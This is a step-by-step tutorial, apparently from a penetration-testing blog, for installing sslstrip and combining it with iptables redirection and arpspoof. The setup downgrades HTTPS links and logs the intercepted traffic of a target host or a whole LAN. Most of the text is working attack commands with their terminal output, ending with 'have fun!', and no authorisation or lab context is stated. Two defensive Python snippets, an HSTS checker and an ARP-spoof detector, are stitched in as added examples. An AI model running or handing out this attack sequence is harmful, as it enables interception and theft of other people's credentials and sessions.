This tutorial will show you how to set up sslstrip. It transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, and maps those links into either look-alike HTTP links or similar HTTPS links. It also supports modes for supplying a favicon that looks like a lock icon, selective logging, and session denial.
Aren't you excited?!
Open a terminal window
Download sslstrip from:
http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
With this command:
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
#BEGIN TERMINAL OUTPUT
root@bt:~# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
--2011-12-05 01:35:11-- http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
Resolving www.thoughtcrime.org... 72.14.190.145
Connecting to www.thoughtcrime.org|72.14.190.145|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22198 (22K) [application/x-gzip]
Saving to: `sslstrip-0.9.tar.gz'
100%[====================================================================================>] 22,198 --.-K/s in 0.07s
2011-12-05 01:35:11 (306 KB/s) - `sslstrip-0.9.tar.gz' saved [22198/22198]
#END TERMINAL OUTPUT
Extract the package "sslstrip-0.9.tar.gz" with the following command:
tar -zxvf sslstrip-0.9.tar.gz
#BEGIN TERMINAL OUTPUT
root@bt:~# tar -zxvf sslstrip-0.9.tar.gz
sslstrip-0.9/
sslstrip-0.9/README
sslstrip-0.9/COPYING
sslstrip-0.9/setup.py
sslstrip-0.9/sslstrip/
sslstrip-0.9/sslstrip/StrippingProxy.py
sslstrip-0.9/sslstrip/SSLServerConnection.py
sslstrip-0.9/sslstrip/ServerConnectionFactory.py
sslstrip-0.9/sslstrip/ClientRequest.py
sslstrip-0.9/sslstrip/ServerConnection.py
sslstrip-0.9/sslstrip/CookieCleaner.py
sslstrip-0.9/sslstrip/__init__.py
sslstrip-0.9/sslstrip/DnsCache.py
sslstrip-0.9/sslstrip/URLMonitor.py
sslstrip-0.9/lock.ico
sslstrip-0.9/sslstrip.py
#END TERMINAL OUTPUT
You also need to make sure you have Python 2.5 or later and the Python "twisted web" module installed.
Install them like this:
apt-get install python python-twisted-web
In my case they were already installed:
#BEGIN TERMINAL OUTPUT
root@bt:~# apt-get install python python-twisted-web
Reading package lists... Done
Building dependency tree
Reading state information... Done
python is already the newest version.
python-twisted-web is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 38 not upgraded.
#END TERMINAL OUTPUT
Now change to the "sslstrip-0.9" directory:
cd sslstrip-0.9
#BEGIN TERMINAL OUTPUT
root@bt:~# cd sslstrip-0.9
root@bt:~/sslstrip-0.9# ls
COPYING lock.ico README setup.py sslstrip sslstrip.py
#END TERMINAL OUTPUT
Run the command:
python ./setup.py install
#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# python ./setup.py install
running install
running build
running build_py
creating build
creating build/lib.linux-x86_64-2.6
creating build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/CookieCleaner.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnectionFactory.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/StrippingProxy.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ClientRequest.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/__init__.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/DnsCache.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/SSLServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/URLMonitor.py -> build/lib.linux-x86_64-2.6/sslstrip
running build_scripts
creating build/scripts-2.6
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
changing mode of build/scripts-2.6/sslstrip from 644 to 755
running install_lib
creating /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/CookieCleaner.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnectionFactory.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/StrippingProxy.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ClientRequest.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/__init__.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/DnsCache.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/SSLServerConnection.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/URLMonitor.py -> /usr/local/lib/python2.6/dist-packages/sslstrip
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/CookieCleaner.py to CookieCleaner.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnectionFactory.py to ServerConnectionFactory.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py to ServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/StrippingProxy.py to StrippingProxy.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ClientRequest.py to ClientRequest.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/__init__.py to __init__.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/DnsCache.py to DnsCache.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/SSLServerConnection.py to SSLServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/URLMonitor.py to URLMonitor.pyc
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
creating /usr/local/share/sslstrip
copying README -> /usr/local/share/sslstrip
copying COPYING -> /usr/local/share/sslstrip
copying lock.ico -> /usr/local/share/sslstrip
running install_egg_info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up...
#END TERMINAL OUTPUT
Now we need to turn on IP forwarding. Run this command:
echo "1" > /proc/sys/net/ipv4/ip_forward
Next, iptables has to be set up to redirect HTTP traffic to sslstrip:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
Change the <listenPort> above to an ephemeral port. Something like 30000 should do.
So it should look like this:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 30000
Now we are going to execute sslstrip. Run this command:
sslstrip -a -l 30000 -w secret.log
The listening port is whatever port you chose for iptables to redirect HTTP traffic to.
#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip -a -l 30000 -w secret.log
sslstrip 0.9 by Moxie Marlinspike running...
#END TERMINAL OUTPUT
Notice in the terminal output above that sslstrip is running. Don't kill the terminal session.
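The link rewriting described at the top only works because the victim's browser makes its first request over plain HTTP and accepts whatever comes back; HTTP Strict Transport Security is the server-side answer, since a browser that already holds the pin refuses to send the request over HTTP at all. The checker below is an added example, not part of this tutorial or of sslstrip: it parses a Strict-Transport-Security header and reports how much of a downgrade window remains. The response headers are constructed, and the `preloaded` flag stands for whether the site is in the browsers' HSTS preload list (the caller has to know that).

```python
def parse_hsts(value):
    """Parse a Strict-Transport-Security value into (max_age, include_subdomains, preload).
    Returns None when max-age is missing or not a number; browsers ignore such a header."""
    max_age, subdomains, preload = None, False, False
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                max_age = int(arg.strip().strip('"'))
            except ValueError:
                return None
        elif name == "includesubdomains":
            subdomains = True
        elif name == "preload":
            preload = True
    return None if max_age is None else (max_age, subdomains, preload)


def downgrade_exposure(headers, preloaded=False):
    """Classify what an sslstrip-style downgrade can still do against these response headers.
    `preloaded` (assumption supplied by the caller) is whether the host is in the preload list."""
    sts = next((v for k, v in headers.items() if k.lower() == "strict-transport-security"), None)
    if sts is None:
        return "every_visit"      # a bare redirect to https:// is exactly what sslstrip rewrites
    parsed = parse_hsts(sts)
    if parsed is None or parsed[0] <= 0:
        return "every_visit"      # malformed header, or max-age=0, which removes the pin
    max_age, subdomains, preload = parsed
    if preloaded and subdomains and preload:
        return "none"             # pin ships with the browser; no trust-on-first-use window
    if not subdomains:
        return "first_visit_and_subdomains"   # hosts under the domain without their own pin
    return "first_visit"          # only the first, not-yet-pinned visit can be stripped


# Constructed sample responses for a hypothetical login host (not from any real site)
REDIRECT_ONLY = {"Location": "https://login.example.com/"}
PINNED = {"Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload"}
APEX_ONLY = {"Strict-Transport-Security": "max-age=31536000"}

if __name__ == "__main__":
    for name, hdrs in (("redirect only", REDIRECT_ONLY), ("pinned", PINNED), ("apex only", APEX_ONLY)):
        print(name, "->", downgrade_exposure(hdrs, preloaded=(hdrs is PINNED)))
```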
Open a new terminal window.
Now we need to set up arpspoof so the network will think you are the gateway or router. This way all traffic is sent to your machine first, then forwarded to the proper gateway on your network.
arpspoof -i <interface> -t <targetIP> <gatewayIP>
If you don't know your interface name, just run a quick "ifconfig" command and it will list it. The <gatewayIP> is the network's real gateway/router; this is the traffic we want to hijack.
If you want arpspoof to intercept traffic across the whole LAN run:
arpspoof -i <interface> <gatewayIP>
So, I would run the command like this:
arpspoof -i eth0 -t 10.10.1.20 10.10.1.254
#BEGIN TERMINAL OUTPUT
root@bt:~# arpspoof -i eth0 10.10.1.254
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79
#END TERMINAL OUTPUT
Notice in the terminal output above that ARP replies are sent constantly; just let it run. Don't kill the terminal session.
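From the defender's side, the unsolicited ARP replies shown above are the observable signal: a host that keeps a known-good binding for its gateway sees the gateway IP suddenly claimed by a different MAC, repeated every few seconds. The detector below is an added example, not part of this tutorial or of dsniff; it parses "reply <ip> is-at <mac>" lines in the format arpspoof prints (and the equivalent tcpdump -e wording) and raises an alert on a MAC conflict for a trusted address or on a burst of identical replies. The trusted gateway MAC and the capture lines are constructed sample data.

```python
import re

# "arp reply <ip> is-at <mac>" as arpspoof prints it, or "Reply <ip> is-at <mac>"
# as tcpdump -e renders the same frame on the wire; matched case-insensitively.
ARP_REPLY = re.compile(r"reply\s+(\d{1,3}(?:\.\d{1,3}){3})\s+is-at\s+([0-9a-fA-F:]+)", re.I)


def normalize_mac(mac):
    """Zero-pad each octet so 0:c:29:39:6c:79 and 00:0c:29:39:6c:79 compare equal."""
    return ":".join(part.zfill(2).lower() for part in mac.split(":"))


def parse_arp_replies(lines):
    """Yield (ip, mac) for every ARP reply found in the capture lines."""
    for line in lines:
        m = ARP_REPLY.search(line)
        if m:
            yield m.group(1), normalize_mac(m.group(2))


def detect_arp_spoof(lines, trusted, burst_threshold=5):
    """Return sorted alert tuples: ("mac_conflict", ip, mac, n) when a trusted IP is
    advertised by another MAC, and ("reply_burst", ip, mac, n) when one binding is
    advertised burst_threshold times or more, as the repeated replies above would be."""
    counts = {}
    for ip, mac in parse_arp_replies(lines):
        counts[(ip, mac)] = counts.get((ip, mac), 0) + 1
    alerts = []
    for (ip, mac), n in counts.items():
        expected = trusted.get(ip)
        if expected is not None and normalize_mac(expected) != mac:
            alerts.append(("mac_conflict", ip, mac, n))
        if n >= burst_threshold:
            alerts.append(("reply_burst", ip, mac, n))
    return sorted(alerts)


# Constructed sample data: an assumed real gateway MAC, the spoofed reply in the
# arpspoof output format above, and one legitimate reply in tcpdump -e format.
TRUSTED = {"10.10.1.254": "00:50:56:de:ad:01"}
SPOOFED = "0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at 0:c:29:39:6c:79"
LEGIT = ("00:50:56:aa:bb:cc > 00:0c:29:11:22:33, ethertype ARP (0x0806), length 42: "
         "Reply 10.10.1.7 is-at 00:50:56:aa:bb:cc, length 28")
SAMPLE_LINES = [SPOOFED] * 7 + [LEGIT]

if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_LINES, TRUSTED):
        print(alert)
```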
If you need additional help just run:
sslstrip --help
#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip --help
sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>
Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.
#END TERMINAL OUTPUT
That's it...have fun!